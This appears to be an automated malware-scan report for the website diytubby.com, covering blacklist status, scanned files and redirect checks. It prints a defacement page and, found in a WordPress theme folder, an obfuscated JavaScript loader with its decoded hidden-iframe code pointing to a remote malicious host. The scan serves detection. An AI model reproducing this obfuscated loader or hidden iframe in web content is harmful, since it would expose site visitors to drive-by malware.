Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=diytubby.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://diytubby.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://diytubby.com/ | 200 OK Content-Length: 1147 Content-Type: text/html | clean |
http://diytubby.com/.ftpquota | 403 Forbidden Content-Length: 330 Content-Type: text/html | clean |
http://diytubby.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://diytubby.com/1337.html | 200 OK Content-Length: 922 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: Hacked by H4x0r HuSsY <html>
<head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Hacked by H4x0r HuSsY</title> </head> <body bgcolor=black lang=EN-US style='tab-interval:36.0pt; text-align:center'> <p align="center" dir="ltr"><font size="7" color="Red">======================<br>[!] Struck by H4x0r HuSsY<br>======================</font></p> <p align="center" dir="ltr"><font size="8" color="Green">SECURITY BREACHED BY < ...[562 bytes skipped]... | ||
http://diytubby.com/cgi-bin/ | 403 Forbidden Content-Length: 329 Content-Type: text/html | clean |
http://diytubby.com/wp-content/ | 200 OK Content-Length: 348 Content-Type: text/html | clean |
http://diytubby.com/wp-content/themes/ | 200 OK Content-Length: 295 Content-Type: text/html | clean |
http://diytubby.com/wp-content/themes/typebased/ | 200 OK Content-Length: 2722 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}catch(qqq){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];if(1){f='fromCh';f+='arC';f+='qgode'["substr"](2);}w=this;e=w[f.substr(11)+zz];t='y';} n="3.5!3.5!51.5!50!15!19!49!54.5!48.5!57.5!53.5!49.5!54!57!22!50.5!49.5!57!33.5!53!49.5!53.5!49.5!54!57!56.5!32!59.5!41!47.5!50.5!38!47.5!53.5!49.5!19!18.5!48!54.5!49!59.5!18.5!19.5!44.5!23!45.5!19.5!60.5!5.5!3.5!3.5!3.5!51.5!50!56!47.5!53.5!49.5!56!19!19.5!28.5!5.5!3.5!3.5!61.5!15!49.5 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://fsddddffsfsffff.myfw.us/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://fsddddffsfsffff.myfw.us/?go=2');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','1 <iframe src='http://fsddddffsfsffff.myfw.us/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://diytubby.com/wp-content/upgrade/ | 200 OK Content-Length: 251 Content-Type: text/html | clean |
http://diytubby.com/wp-content/uploads/ | 200 OK Content-Length: 287 Content-Type: text/html | clean |
http://diytubby.com/wp-content/uploads/2010/ | 200 OK Content-Length: 301 Content-Type: text/html | clean |
http://diytubby.com/wp-content/uploads/2010/10/ | 200 OK Content-Length: 1328 Content-Type: text/html | clean |
http://diytubby.com/wp-content/uploads/2010/10/3795330063_681eeb0037-150x150.jpg | 200 OK Content-Length: 6478 Content-Type: image/jpeg | clean |
http://diytubby.com/wp-content/uploads/2010/10/3795330063_681eeb0037-199x300.jpg | 200 OK Content-Length: 13767 Content-Type: image/jpeg | clean |
http://diytubby.com/wp-content/uploads/2010/10/3795330063_681eeb0037.jpg | 200 OK Content-Length: 79109 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: diytubby.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Jul 2014 04:08:17 GMT
Server: Apache
Content-Length: 1147
Content-Type: text/html;charset=ISO-8859-1
...1147 bytes of data.
GET / HTTP/1.1
Host: diytubby.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Jul 2014 04:08:17 GMT
Server: Apache
Content-Length: 1147
Content-Type: text/html;charset=ISO-8859-1
...1147 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: diytubby.com
Referer: http://www.google.com/search?q=diytubby.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: diytubby.com
Referer: http://www.google.com/search?q=diytubby.com
Result:
The result is similar to the first query. There are no suspicious redirects found.